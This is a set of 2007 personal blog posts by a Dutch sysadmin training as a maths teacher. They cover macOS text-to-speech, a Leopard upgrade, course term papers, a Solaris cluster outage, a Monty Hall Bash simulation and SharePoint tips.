You can use the voice-over utilities to create audio files as well. Cheap audio-books anyone? Of course, Alex doesn't speak as vividly as any other narrator, but still.

Here's how to do it:

1. Open Terminal.app to get to the command line.

2. Type "say -f ".

3. Drag a plain text file from Finder into the Terminal window.

4. Type " -o ~/Desktop/Spoken.aiff"

5. Press enter.

The say command will read the text input file (-f flag stands for "file") and will output the audio as .AIFF file (-o stands for "output"). The resulting file will appear on your desktop. Once it's done you can convert the .AIFF file to .MP3 using Amadeus.
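
Or, as a single line (the file name is just an example):

$ say -f ~/Documents/chapter1.txt -o ~/Desktop/Spoken.aiff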

EDIT2:

Of course, another neat use for this command is to tell you when a huge task is done. For example, I run the "TEC-analysis.sh" script from the command line to analyse a week's worth of Tivoli alarms. It'd be very easy to do the following:

$ ./TEC-analysis.sh; say TEC Analysis complete!


kilala.nl tags: , ,

View or add comments (curr. 4)

Leopard upgrade, part 1: Powermac

2007-11-03 15:44:00

My new Leopard desktop

Last night I upgraded the first of our three Macintoshes to the new Mac OS X Leopard. I'd decided to start out with the Powermac, since that one's the least crucial of our Macs. Before upgrading her iBook, Marli wants to see the new OS work on my Powermac. And of course I'm saving the all-important work-Macbook for last.

The installation was -not- without problems. I'd forgotten that I'd installed APE (Application Enhancer), which royally screws up any new Leopard install. This isn't that farfetched, since it's a rather hackish piece of software.

After doing a completely fresh, reformatted, install I found another unpleasant surprise: the Migration Assistant software cannot import users whose homedirectory has been File Vaulted. Crap. This meant that I had to transfer all my files and preferences by hand.

So far I like the new OS well enough (haven't noticed much difference), though there's one thing that I already loathe: Spaces. I -love- having a virtual desktop manager built into OS X. Absolutely. I just hate two of the "features" of Spaces.

1. You cannot move windows from one desktop to another using a key combo.

2. Spaces automatically switches to the desktop containing the -main- window of the application you select.

Why is number 2 so bad? Well, let's say that I'm typing up a report on desktop 4. Now a friend pops up on MSN, through Adium. The new Adium window appears on my current desktop: 4. I switch to Adium, to type a reply, and "zing!" I'm moved to desktop 2 because that's where Adium's main window resides.

That fscking sucks!

More Leopard gripes later :)


kilala.nl tags: , ,

View or add comments (curr. 0)

All my term papers for Didactics 2 (Vakproject Vakdidactiek 2)

2007-11-02 11:51:00

I assume that it's Hogeschool Utrecht's philosophy to start their students off with basic knowledge that can be applied in practice, followed by years of more advanced information. This methodology has irked quite a few of my classmates, but I really don't mind. I actually quite like it.

One of the more advanced courses (it's a second year's class) is Vakproject Vakdidactiek 2 (General & Maths didactics 2). This course is divided into two separate streams: one covering general didactics for the complete n00bs (like me) and one covering didactics in maths. The first stream is finalised with an exam, while the second stream requires the student to write a full dozen (12!!!) reports.

I have already written summaries on general didactics, which can be found on this page and on this page. The page you're currently browsing features -all- of my term papers for the maths didactics part.



Dossier opdracht 1

At the start of this second year's course we are asked what we believe makes a "good" maths teacher. We are asked to analyse our own strengths and weaknesses, so we can form goals for ourselves.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 2

This report is based on BIT-report 1. What's different is that dossier opdracht 2 also contains my description of the lessons I've drawn from the course material.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 3

We've already discussed direct instruction on earlier occasions (BIT-report 1). For this assignment, students are expected to design a class plan on the subject of the Pythagoras theorem.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 4

After working on dossier opdracht 3, students are asked to review each other's work in pairs. Report 4 contains the feedback that I've given one of my class mates.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 5

Term paper 5 requires that I spend some time teaching a class. Unfortunately I haven't been able to do that yet. Hence, there's no paper for you to review.



Dossier opdracht 6

This one's a huge one, weighing in at around thirty pages! We are asked to take an exam that's been handed out in class and turn it inside out. What's wrong with it? What's good about it? How would you grade the paper?

We are also given five tests as they were turned in by students. What did they do right? Where did they go wrong? Can you understand why they made certain mistakes?

This was a very interesting assignment, but IMHO it was just too fscking huge. I sank at least thirty hours into this report.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 7

Term paper 7 requires that I spend some time teaching a class. Unfortunately I haven't been able to do that yet. Hence, there's no paper for you to review.



Dossier opdracht 8

Term paper 8 requires that I spend some time teaching a class. Unfortunately I haven't been able to do that yet. Hence, there's no paper for you to review.



Dossier opdracht 9

This assignment focusses on the problems high school students may encounter when using the Dutch language. Students are asked to read and analyse a few chapters on this matter.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 10

This assignment focusses on the problems high school students may encounter when using the Dutch language. The object is to analyse an assignment that would've been used on an exam, to find its flaws and to rewrite it.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 11

This assignment focusses on cooperative learning, as pioneered by Dr. Spencer Kagan. It contains a summary of relevant chapters from our course books, as well as a BIT reading report.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 12

This assignment focusses on cooperative learning and takes a look at Wiki's as a learning tool.

This document is available as a .PDF document and can be downloaded here.


kilala.nl tags: , , ,

View or add comments (curr. 0)

All my term papers for Statistics 1 (Statistiek - Vakdidactiek)

2007-11-02 10:30:00

The first year at Hogeschool Utrecht's study Tweedegraads docent wiskunde starts you off with a course in statistics. They could've picked any part of math to start out with, but it was this one :)

The course, Statistics 1, is divided into two classes: one dealing with the actual maths, the other dealing with the didactics involved with teaching statistics. The first class ends with an exam, while the second requires you to hand in a total of eight papers (called dossier opdrachten). This page serves as a portal to all eight of my reports.



Dossier opdracht 1

As their first assignment of the year, students are asked to investigate how statistics are taught in high school. We are asked to focus on the first three years of HS, thus limiting the scale of the job.

Each student picks one specific method and searches through all the books for those three years. Any mention of statistics should get a little footnote, while whole chapters on statistics deserve a thorough analysis. For my report I picked the Getal en ruimte method.

This document is available as a .PDF document and can be downloaded here. Be aware that the file is a whopping 10MB, due to the heavy use of images.



Dossier opdracht 2

In a similar light as the first paper, students are asked to investigate the final terms for statistics. The VMBO have a list with specific subjects from statistics that should be featured in the exams. We are asked to pick one assignment per subject from the method we used for the first paper.

This document is available as a .PDF document and can be downloaded here. Be aware that the file is a whopping 6MB, due to the heavy use of images.



Dossier opdracht 3

One of the many philosophies in teaching is direct instruction (directe instructie). One of the key principles of this philosophy is that one should keep students motivated. Motivated students are willing to accept education and will thus learn more efficiently. For more information on direct instruction, read BIT-report 1 on maths didactics.

In order to grasp students' attention it's good to start a class with a bang. We were asked to write three separate opening sessions (15 minutes each), which can be used in a class on statistics. One of these openings will be presented in class. For a report on these presentations, read my class notes for weeks 3 through 5.

My class openings use the following subjects:

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 4

After giving the presentation mentioned with dossier opdracht 3, each student is given feedback by his classmates. Feedback is gathered through forms created by the student and through forms handed out by the teacher.

Dossier opdracht 4 gathers all the feedback into one report, for analysis. It's expected that I use this report as a guideline for future learning goals.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 5

In teaching statistics, schools often make a grab for software like MS Excel and VU Stat (or SPSS). For this report, students are asked to investigate the capabilities of these tools and to assess their usefulness in teaching statistics.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 6

For paper 5 we researched software that runs on the local computer, like Excel and VU Stat. With paper 6 we are asked to research online tools. One may not expect this, but there are a few websites out there that offer schools online learning suites.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 7

The students are asked to investigate GWAs. In this case, GWA stands for Geintegreerde Wiskunde Activiteit (Integrated Maths Activity). The idea behind GWAs is that they're supposed to help students discover the place math has in daily life.

GWA assignments pose the student a problem and give no hints as to the required theory. A student is expected to figure things out by himself. He'll need to discover which pieces of theory are required and how he should combine them.

Our investigation quickly glances over the how-and-why of GWAs. One of the most important conclusions of the report is a list of five characteristics that a "good" GWA should have.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 8

As you may have read, dossier opdracht 8 gave me quite a bit of trouble.

The students are asked to create a GWA for students in their first, second or third year of high school. My report covers a GWA on electronic payments (electronisch betalen).

This document is available as a series of three .PDF documents. Part 1. Part 2. Part 3.


kilala.nl tags: , , ,

View or add comments (curr. 2)

W00t! New books have arrived.

2007-10-31 20:22:00

Three new books and a pamphlet

This year's second semester will start in about a week. In preparation for my new courses I've been ordering books left and right. Luckily I already own the most expensive book on the list, so I won't have to get that one.

On the pile on the left you see:

* Identity development and student counseling

* Maths for students between 12 and 16

* Teaching effectively: learning maths

* A pamphlet entitled Don't touch me!

The last two items weren't on the official book list, but I decided to get them anyway. Learning maths because it will make a nice addition to my current library. Don't touch me! because I am very curious how one would handle a situation where kids are harassed by others.

This leaves two syllabi that I should buy at school. After that I'm all set.


kilala.nl tags: , , , ,

View or add comments (curr. 4)

A summary of "Lesgeven en zelfstandig leren"

2007-10-27 14:16:00

In my first year at Hogeschool Utrecht I will follow a few second year's courses, to speed up my studies. One of these second year courses is Project Vakdidactiek, which concerns the didactics behind teaching maths.

As part of this course we are also required to take a test labeled Algemene didactiek (general didactics). This test is based on materials we study in Vakdidactiek, but also on the book Lesgeven en zelfstandig leren, by Geerlings and Van Der Meer.

As part of my preparation for this exam I've composed a summary of the three relevant chapters.

My summary is compiled as a 30+ page .PDF document. You can download my summary here.

We are also required to read parts of Leren op school, by C.F. van Parreren. As an aside we have also covered various learning styles as defined by American psychologist Kolb.

This summary is also available as a .PDF document. You can download my summary here.


kilala.nl tags: , ,

View or add comments (curr. 0)

Sometimes clusters do not guarantee high uptime

2007-10-20 13:36:00

Oh me, oh my... Clustering software does not always guarantee high uptime :/

At $CLIENT we've been having some nasty problems with our development SAP box. The box is part of a Veritas cluster and actually runs a bunch of Solaris Zones. The problems originally started about two months ago when we ran into a rare and newly discovered bug in UFS. It took a while for us to get the proper patches, but we finally managed to get that sorted out.

Remco installed the patches on Thursday morning, though he ran into some trouble. As always, patches can give you crap when it comes to cross-dependencies and this time wasn't any different. Around lunch time we thought we had things sorted out and went for the final reboot. All the zones were transferred to the proper boxen and things looked okay.

Until we tried to make a network connection. D:

None of the zones had access to the network, even though their interfaces were up and running. We searched for hours, but couldn't find anything. And like us, Sun was in the dark as well. In the end Remco and Sun worked all night to get an answer. Unfortunately they didn't make it, so I took over in the morning. Lemme tell you, once I was in the middle of all the tech and the phone calls and the managers, I found some more respect for Remco. He did a great job all through Thursday!

Just before lunch both Sun and one of the other guys came up with the solution. That was an awesome coincidence :) Turns out that the problems we were having are caused by timing issues during the boot-up of the Solaris Zones. Because we let Veritas Cluster handle the network interfaces things turned sour. Things would've worked better if we'd let the Zone framework handle things.

The stopgap solution: freeze all cluster resources to prevent fail-over, then manually restart all virtual interfaces for the zones. And presto! It works again!
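
For the curious, the gist of that stopgap looks roughly like this; the group, interface, address and zone names below are placeholders, not our actual config:

hagrp -freeze sap_dev_grp -persistent                                    # keep VCS from failing the group over while we poke at it
ifconfig bge0 addif 10.1.2.3 netmask 255.255.255.0 zone devzone01 up    # hand-plumb a zone's virtual IP from the global zone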

Happily we went to lunch, only to come back to more crap!

Turns out that the five SAP instances we were running wouldn't fit into the available swap space anymore. Weird! Before yesterday, things would barely fit in the 30GB of swap space. And now all of a sudden SAP would eat about 38GB! o_O WTF?!

A whole bunch of managers wanted us to work through the whole weekend to sort everything out. Naturally we didn't feel too enthused, especially since the box's SLA doesn't cover weekend work.

In the end we tacked on some temporary swap space, started SAP and left for the weekend. We'll just have to accept more downtime on Monday. It also leaves us with two big things to fix:

1. Modify the cluster/zone config for the network interfaces.

2. Find out why SAP has grown gluttonous and fix it.


kilala.nl tags: , ,

View or add comments (curr. 1)

A summary of "Statistics 1"

2007-10-14 11:06:00

Statistics seems to be one of the least liked subjects among students taking maths as part of their curriculum. This seems to be the same in both high school and college. I'm not entirely sure why this is, but I've heard a lot of people call the subject matter vague and the rules fuzzy.

The HU must've thought it'd be good to start off with this tough subject, 'cause that's what they dropped on us for the first semester :) STAT1-VAK is one half of the Statistics course, the other half of the course focussing on didactics. STAT1-VAK is closed off with a test of three chapters on statistics, taken from the Moderne Wiskunde books.

This summary focuses on the following chapters from the Moderne Wiskunde books.

You can download the summary as a PDF document.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Freemind: free mind mapping software for all OSes

2007-10-09 09:45:00

A certain colleague of mine has been trying to get us on the mind mapping bandwagon for months now. He uses mind maps to take notes, to organise his projects and lord only knows what else. I've held off on mind maps so far, thinking them to be the latest fad in productivity enhancement.

First off, mind maps are graphical representations of a thought, concept or idea that can be quickly cobbled together. They work by associating new words and ideas to the ones already on paper. So for example, if the central idea is "paper" you may get branches like "material", "writing" and "printing", which may also have branches of their own. Mind maps allow you to brainstorm about a lot of ideas and to quickly take notes of the process.

Yesterday in class we created a mind map about cooperative learning (samenwerkend leren). I've recreated the mind map using Freemind and the result can be seen here.



Free mind mapping software

To create the mind map linked above I've used the free and open source tool FreeMind. This software can be used on Windows, Mac OS X and Linux, which makes it perfectly suitable for students. Of course the price is right too ;)

Because the software is written in Java it takes a while to start up. Once it's up and running it works like a charm and you will not notice any speed issues.

Editing the mind map is very easy. The software distinguishes children and siblings. A child forms a new branch from the currently selected idea. A sibling creates a new branch in parallel to the currently selected idea (a brother, or sister if you will). These two basic functions are performed using either the TAB or the ENTER key, which makes it trivial to quickly type up a big mind map.

Mind maps that you've created can be exported as either graphical files (JPG or PNG), as HTML or as an Open Office file. Those graphical exports are very useful when you want to include your mind map in either a website, or a printed report.

FreeMind offers a lot of additional options that can make for a very snazzy mind map. There's colours and icons aplenty, most of which the average student won't use anyway.

I'm not onboard when it comes to being hyper-enthused about mind maps, but I can now definitely agree that they're very useful.

You can download FreeMind from their SourceForge page.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Cellphones, blight of any teacher

2007-10-07 13:07:00

I'm researching some high school maths projects online, for Statistics 1. In a few cases some actually useful stuff pops up on YouTube. However, when following a few of the YT links I quickly stumbled upon movie after movie of kids misbehaving in class.

It's not the usual tomfoolery like wisecracking or being allround noisy though. No, it's the constant mucking about with cellphones that gets to me. Snapping pictures of each other and messing around with the video camera, trying to be as silly or cool as possible. It's horrible how distracting those gizmos can be!

If I can find the time I'll try and read some teachers' fora, to see how the pros handle cellphones in class. If it were up to me I'd build an EMP box and just fry the lot.

Then again, I should also keep in mind that not every class is going to be like this. It's only the silly, annoying kids that pop up on YouTube :)


kilala.nl tags: , , ,

View or add comments (curr. 3)

A summary of maths didactics

2007-09-26 13:51:00

In my first year at Hogeschool Utrecht I will follow a few second year's courses, to speed up my studies. One of these second year courses is Project Vakdidactiek, which concerns the didactics behind teaching maths.

The final term for this project consists of a dozen reports and assignments, all of which should prove your comprehension of didactics. Materials used in this course include Effectief leren in de les by S. Ebbens e.a. and Wiskundeonderwijs in de basisvorming by APS Publishing.

A few of the assignments require us to make so-called BIT leesverslagen (reading reports). These reports include a summary of the relevant chapters, as well as a chapter covering reflection on the material. On this web page I'll publish the summary sections of these reports. I'll keep the other stuff to myself for now.

Currently, summaries for the following chapters are available.

BIT-report 1

This is part of dossieropdracht 2, which focuses on direct instruction (directe instructie).

You can download the summary as a PDF document.

BIT-report 2

This is part of dossieropdracht 11, which focuses on cooperative learning (samenwerkend leren).

You can download the summary as a PDF document.


kilala.nl tags: , , ,

View or add comments (curr. 0)

The Monty Hall problem

2007-09-22 11:46:00

My white board, with decision trees.

For one of my school assignments I was asked to write three class openings for the subject of statistics. The object of a class opening is to draw in the students, to capture their attention and to motivate them.

The opening I presented at school involved the McNuggets problem (aka the Frobenius problem). It was well received, though most of my class mates thought it better suited for a class on analytical math. I tend to agree with them now.

One of the other openings I've designed involves the famous Monty Hall problem. The one that involves a gameshow, three doors, two goats and a car. Ring a bell?

Because this problem is so counter-intuitive it tends to throw a lot of people off. Their gut instinct tells them that the chance of winning a car (after revealing one of the goats) should be 50%. They are unfortunately incorrect.

Before we continue, some of you may enjoy a snippet from the TV show Numb3rs. The character of Charlie Eppes doesn't explain the solution very clearly, but does a nice job of explaining the problem.

Numb3rs-MontyHall.mov

I tried to come to the proper solution by myself by using a decision tree (boomdiagram in Dutch). It took me a while, but I got there :) My tree looks a bit different from the one Wikipedia shows (linked above), but that's because I use two trees instead of combining them into one.

Going from left to right:

* The original tree, unconstrained, given that you get two choices.

* The gameshow host takes away one of the goats. He asks you whether you want to switch doors.

* The decision tree, should you stay with the door you chose.

* The decision tree, should you decide to switch doors.

The red X-es show the option taken away by the host. The purple X-es show the option taken away by your own choice.

Yes, it's counter-intuitive, but switching doors after having one goat revealed IMPROVES your chances. Instead of having a 1:3 chance, you now have 2:3! Nice!
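
If the trees don't convince you, a quick and dirty Bash simulation might; this is just a sketch I'm adding for illustration, with the door numbering made up on the spot:

#!/bin/bash
# Quick-and-dirty Monty Hall simulation: play N games and compare the two strategies.
# If your first pick happens to be the car, sticking wins; in every other case the
# host's goat-reveal leaves the car behind the remaining door, so switching wins.
N=10000
STAY=0
SWITCH=0
for (( i = 0; i < N; i++ ))
do
    CAR=$(( RANDOM % 3 ))     # door hiding the car
    PICK=$(( RANDOM % 3 ))    # the contestant's first choice
    if [ $PICK -eq $CAR ]
    then
        STAY=$(( STAY + 1 ))
    else
        SWITCH=$(( SWITCH + 1 ))
    fi
done
echo "Sticking with your door wins $STAY out of $N games (about 1 in 3)."
echo "Switching doors wins $SWITCH out of $N games (about 2 in 3)."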

And this is why I think this problem would make a nice opener for a high school course on statistics. It stumps the kids, makes them curious and then amazes them :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

College curricula are -also- mixed bag

2007-09-19 07:35:00

About a week ago I remarked how college books are a mixed bag. Some of them seem really good, though others are almost crap.

Well, the whole mixed bag deal also goes for the course curricula themselves apparently. On Monday a big discussion broke out during SLB1 about the courses' contents. Marjan thought there was too little theory, Karin thought teaching by examples is great, Wouter thought the maths was too easy, Badegul thought the maths were too complicated. And here I was, loving all of college, thinking everything's just right. (transcription)

The points me and Hans tried to make were these:

* College has to cater to the lowest common denominator. During their first year they have to take a whole bunch of -very- different people and ready them for the following years. You simply can't be very specific in your teachings during the first year.

* Isn't college about going out and finding the answers for yourself? If an assignment uses terms that you don't understand, shouldn't you go investigate? Or at least talk to the docent?

At least it's good to know that I'm not the only one still adjusting to college :D


kilala.nl tags: , ,

View or add comments (curr. 0)

Kilalapedia: A wiki for all my class notes

2007-09-18 14:19:00

I've made it a habit to always take notes during class. All of these notes are taken on my laptop, because copying them from paper to my PC is very inefficient. Luckily, so far no one has objected to the presence of my laptop in class.

I thought it'd be useful for both me and my class mates if I put up all these notes on my website. However, since making menu entries for each course would make a big mess, I've decided to put everything in a Wiki.

Please feel free to visit my schoolwork Wiki.


kilala.nl tags: , ,

View or add comments (curr. 0)

Basic ICT skills: Powerpoint Presentation And Slidecast

2007-09-18 08:16:00

Every freshman at Hogeschool Utrecht is required to take a class in Basic ICT skills. The class teaches both young and old about the learning infrastructure in place at HU. Classes cover everything from using Powerpoint and Word, to using the online tools Sharepoint and Osiris.

While I fully agree that this course is an important one, I do feel it's a bit wasted on me. I've been in IT for seven years now! ^_^ I've worked with Sharepoint on at least two occasions before and Osiris is really quite simple if you RTFM.

Since the Basic ICT skills class interferes with two of my other classes, I'm trying to get a Get out of jail free! card. I've spoken with my mentor at school and she asked me to do one of the bigger assignments: a Powerpoint presentation introducing myself. Naturally I complied, seeing as how I'll have to give presentations later on in the school year as well. Might as well create the master slides and templates now, right? ;)

And here it is! Sorry 'bout the dutch, all you USAdians...

Click here for the introduction.

EDIT:
Hmm... The text is quite illegible in the clip that's shown on this page. Things are much better if you download the clip and watch it on its own. You can download it from here, by grabbing IntroThomas.mov.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Course books: they're a mixed bag

2007-09-11 19:33:00

How is it possible for one book to be both highly educational and (IMNSHO) absolutely craptacular at the same time? Case in point: Lesgeven en zelfstandig leren by Geerlings and Van Der Veen.

This course book covers basic didactics of teaching at the high school level. It covers all kinds of interesting subjects and I feel that there's a lot for me to learn.

Unfortunately the book's laced with three things that irk me.

1. To me it seems that the authors often skim over stuff that could be very interesting. Instead of taking an analytical, or academic approach, they fill chapters with examples and stories. There's nothing wrong with examples, but neither is there with pure psychology.

2. The book feels outdated and like it was written by cuddly-fluffy psychologists. The kind who want to pamper kids and feel that they should be let free to explore their youth and possibilities. *cue Care Bear song* Seriously, I'm all for letting kids discover what they can and can't do, but I believe that in the end kids also need structure and hierarchy. Besides, the original print was written in the eighties D:

3. Their writing is atrocious at times. At the beginning of chapter five there's a sentence that runs for a full -ten- lines! It runs a hundred and thirty words in length! What the fsck were they thinking?

And then there's pure genius like this:

In reality, assessing the beginning situation [of a student] is done based on 'experience'. This is a conglomerate of pedagogic-didactical knowledge and intuition.

/me shakes head

/me goes back to studying


kilala.nl tags: , , ,

View or add comments (curr. 7)

Tips and tricks for Microsoft Sharepoint

2007-09-11 14:42:00

Like many other companies and organizations, Hogeschool Utrecht uses specialized software to facilitate collaboration between students and faculty. HU makes use of Microsoft Sharepoint, which is a web based toolset. Sharepoint is pretty damn versatile in what it can do for you, though we'll only use the most rudimentary functions.

Unfortunately, all those functions tend to make Sharepoint a little bit unwieldy. Kind of like how MS Office is bloated as well. On this page I'll gather tips and tricks that should make using Sharepoint just a little bit easier.

Securing your shared folders

You will be storing a lot of your school work in the Shared Documents folders on Sharepoint. That way teachers and faculty will be able to read and download your work. However, it's only natural that you don't want all of your fellow students to rifle through your stuff. That's why setting access permissions is important.

Here's how you can secure a folder that holds your school work.

  1. Create a new folder. Do this by clicking the arrow on the Create button and selecting New folder.
  2. A new window appears. Enter a name for the new directory and confirm.
  3. The directory has been created!
  4. Hold your mouse over the name of the directory, but don't click. You should see an arrow appear next to the name. Click it.
  5. From the list, select Manage Permissions.
  6. A new window appears. It shows four classes of people who can get access to the directory. To secure the directory you should have the following permissions in place:
    • HVU Medewerkers: Read
    • HVU Studenten: Limited access
    • System Account: Limited access
    • <You>: Full Control
  7. You can change the permissions for one class by clicking on its name. You can then modify the settings in a new screen.
  8. Once all permissions are set as you want, you're done. You won't have to click anything because the permissions are already active.

Copying multiple files at the same time

Sharepoint is great because it lets you access all your files and information through a web browser. Unfortunately this interface sucks when you want to copy a lot of files and directories at the same time. Luckily, there -is- a way to do it easily. The downside is that this requires Windows 2000 (or higher) and Internet Explorer 6 (or higher).

The method we'll use to copy loads of files is called the Explorer View. It allows you to open your Sharepoint directories in Windows Explorer. That's the same piece of software you use to work with files and directories on your PC.

  1. Open your Sharepoint page.
  2. Go into the directory where you want to upload files.
  3. In the menu bar of this folder select Actions -> Open with Windows Explorer, or Open in Explorer View.
  4. A new window will open up that gives you Explorer access to your directory.

If that doesn't work, try it as follows.

  1. Open your Sharepoint page.
  2. Go into the directory where you want to upload files.
  3. In the menu bar of this folder select Settings -> Document Library Settings.
  4. Scroll down until you find the heading Views. Below that header you'll see a link called Explorer View. Click it.
  5. On the next screen, don't change anything. Just click OK.
  6. Wait a moment while Internet Explorer is processing the Explorer View.
  7. Your IE window now contains the Windows Explorer view of your document directory.

You can now drag files from your computer into this view. You can also create new directories much easier. And if you want you can copy a whole directory tree in there!

Attention Mac OS X people!

You -can- use Firefox or Safari to access Sharepoint. However, many of the advanced features will not work, like the MS Office integration. Luckily, most of those features are crap anyway so you won't use them ^_^ Sadly, the Explorer View does -not- work in these browsers, since it requires Internet Explorer 6+. For that feature, you'll need to use Windows. Or just live without the EV.

If you happen to be using Windows inside a Parallels virtual machine, then there's one nasty glitch with the Explorer View. Mac OS X automatically creates hidden files inside each directory, called .DS_Store. When you're copying a whole directory, these files will cause your copy to fail. It's better to create the directory and then copy all of its files to the Sharepoint directory manually.
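If you want to clean those hidden files out before copying, a quick pass with find from the Terminal does the trick. This is just a sketch; the path below is an example, so double-check what it matches before deleting anything.

  cd ~/Documents/schoolwork                    # example: the folder you're about to copy
  find . -name '.DS_Store' -type f -delete     # removes Finder's hidden metadata files

After that, dragging the directory into the Explorer View should no longer trip over them.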

Freeing up storage space

Over at the HU each student is assigned 100 MB of storage space for their files on Sharepoint. Once your space runs out you won't be able to add any new stuff. That would be bad, because you'll need to be able to upload new schoolwork. Right?

One tricky part about Sharepoint is that, if you erase a file, it isn't really gone yet. Just like on your PC, Sharepoint keeps your trash in a trashcan that needs to be emptied. And unfortunately the contents of the trashcan also count against your storage space.

So if you start getting e-mails from Sharepoint, warning you about your space usage, click on the link in the mail. That will take you to your usage report page. On that page you will also find a link to your trashcan. Click it and remove all of the files in the trash. And presto! Your Sharepoint site can breathe again!


kilala.nl tags: , , ,

View or add comments (curr. 0)

What? I've already got school results and grades?

2007-09-11 12:49:00

A modded screenshot of Osiris

Well, that was a surprise! I was dicking around in Osiris, the online student management toolset at HU. Enrolling in a few classes, signing up for tests and term papers, just generally looking around and exploring.

After clicking the Results button I was greeted with a big list. But how is it possible that I already have grades?! I just started school a week ago!

Then I took a closer look at the dates. Apparently my student number isn't the only thing that carried over to my new college enrollment ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Slugging through my homework

2007-09-08 19:10:00

Wow, this is a lot of work :)

Yesterday I raced through a large part of my first dossier assignment for Statistics 1. The didactical part of the course, that is. I'm about halfway through that assignment, though what remains will take more effort than what I did yesterday.

How do I know this? Because the second part of that assignment requires that I work through each maths assignment that I picked for my report. And judging by today's progress through the other part of Statistics 1 (the real maths), I'm going to need a long while.

My homework for Monday said that I'd need to study paragraphs 1.0-1.3 and 1.4-1.6. Sounds rather simple right? Well, it looks it too, since each paragraph is only two pages. However, looks can be deceiving since so far I've needed about an hour-and-a-half per paragraph! Ouch!

Talk about underestimating the workload! Tonight's gonna be an all-nighter.

Luckily, productivity blog LifeHacker provided me with something useful today! They posted about the why and how behind power naps. I took one this afternoon before studying and I'll take another one around 20:00.

EDIT:

Meanwhile, the cat's asleep on her pillow. She's actually snoring! That's so cute! <3


kilala.nl tags: ,

View or add comments (curr. 1)

Getting my Canon scanner to work (n650u on Mac OS X)

2007-09-05 21:45:00

Please let the record state that Canon are a bunch of f-ing toolboxes when it comes to their scanners. More specifically, when it comes to using their scanners in Mac OS X. Some of their older models are completely unusable, although there are tricks, rituals and voodoo that may get you varying results.

I've fought a few times to get my N650u to work.

I need to scan some stuff for school. Since I cannot drag along my Powermac (which runs the Classic Canon tools) I've fought my Macbook for an hour or so tonight. I tried all the crap that's out there, but Canon's software's crap. So I caved in and bought Vue Scan. Thankfully it's come down in price since the last time I wrote about it.

At least I can use the bill for VueScan to get a tax write-off, since it was a purchase made for school. *sigh*


kilala.nl tags: , ,

View or add comments (curr. 0)

Holy shit! That's a lot of work!

2007-09-04 22:14:00

A screenshot from Schoolhouse 2

Holy crap! I just entered all of my homework and such for the following few weeks. The screenshot to the left is my current ToDo list in Schoolhouse 2. You probably can't see it very clearly, but it boils down to the following.

Due in one week -> Read about five chapters, do all relevant assignments.

Due in two weeks -> Read about six chapters, do all relevant assignments. WRITE FIVE REPORTS!

Crikey!

Now I'm off to bed. For now I'll stick to a regimen where I do schoolwork both before and after my normal, sysadmin work. So there's a bit in the early morning and the rest is between 1900 and 2200.

Like I said earlier today: I've good reason to be nervous!


kilala.nl tags: ,

View or add comments (curr. 0)

What a day! My first day at school

2007-09-04 10:34:00

Satellite view of my school

Wow! I'm feeling exhilarated! This whole going-back-to-school thing rocks ^_^

Yesterday was my first day at Instituut Archimedes, following classes from 12:00 until 21:45. As I mentioned earlier, this semester's roster entails four classes: Statistics 1 (math and didactics), Study Guidance and Math didactics 2. I'm very lucky to have a break between 18:00 and 20:00, giving me time to get started on homework and have some dinner.

The folks at school all seem quite nice. The teachers are cool and usually in their thirties. My classmates range between 21 and 56, though there's one daunting thing about them: over 80% of them are already in education. O_O

So yea, that's a little intimidating. Being one of the few who have no teaching experience whatsoever and who don't currently hold a teaching position. That second part is really important for classes that need me to do projects in a teaching environment. Where the heck am I going to find a bunch of thirteen year olds, just to try some teaching methods on them?!

Aside from the exhilaration, there's also nervousness. I'd already mentioned it before, but it's still there. The feeling that I -know- that I can fail at what I'm doing here. The feeling that I'm treading completely new ground. The feeling that I'm getting in over my head. Mind you, I'm still loving it, but that doesn't mean I don't feel the fear :)

About the workload... I was prepared for (and expected) a lot of work. However, it seems that I underestimated things a little. Aside from working 32 hours a week for Snow I will also need to spend about 40 hours per week to earn my ten credits this semester. The basic math: 1 ECT equals about 28 hours of work. Three of my courses are good for hard credits: 10 ECTS in total. So in about seven weeks I'll have to shift 280 hours of work. Ouch! Goodbye social life! :)

Ah well... First, let's see how hard things really are.

In the meantime Marli is of great value to me, giving me loadses of support! The fact that she's so proud of me and has faith in me really means a lot!


kilala.nl tags: , ,

View or add comments (curr. 2)

Using Moderne Wiskunde Helpdesk with Mac OS X or Linux

2007-09-04 07:01:00

A lot of students, both high school and college, use the Moderne Wiskunde books to study maths. These books include CD-ROMs that should aid the student in comprehending the new material. They contain various Flash animations per subject, as well as a number of tests and assignments.

Sounds good right? Were it not for the fact that these CD-ROMs only work properly in Windows. I've verified it this morning: while all of the contents are web apps, they are written purely for Windows XP and Internet Explorer.

Not even the combination Windows + Firefox works, since apparently Wolters Noordhoff only use specific IE commands to work with Flash. If there is such a thing. The software wouldn't work in my Firefox, complaining about the Flash version.

As one can expect I also tried to run the CD in Mac OS X. This can be done by inserting the CD and then directing Safari to open $CD/dlo/index.htm. This part of the procedure works as expected, as can be seen from the screenshot above. However, when you attempt to start an animation it all goes to dust. No dice. I just get a blank screen.
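For the record, this is roughly how I point Safari at the CD from the Terminal. The volume name is an assumption on my part; check what the disc is actually called under /Volumes first.

  ls /Volumes/                                              # find the CD's real volume name
  open -a Safari "/Volumes/ModerneWiskunde/dlo/index.htm"   # open the start page in Safari

Mind you, this only gets you to the menu; the animations themselves still refuse to play.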

Seriously, how hard could it be to re-write a fricking web application to work with non-Windows, non-IE systems? *sigh* I've e-mailed W-N for comments. Let's see if they'll react. Their website also sucks in Safari, clearly written for Windows-folks as well. :(

For now the only way to run this software properly on a Mac is either by installing Bootcamp, Parallels, or VMWare. You can then run Windows in a secured and tucked away place.



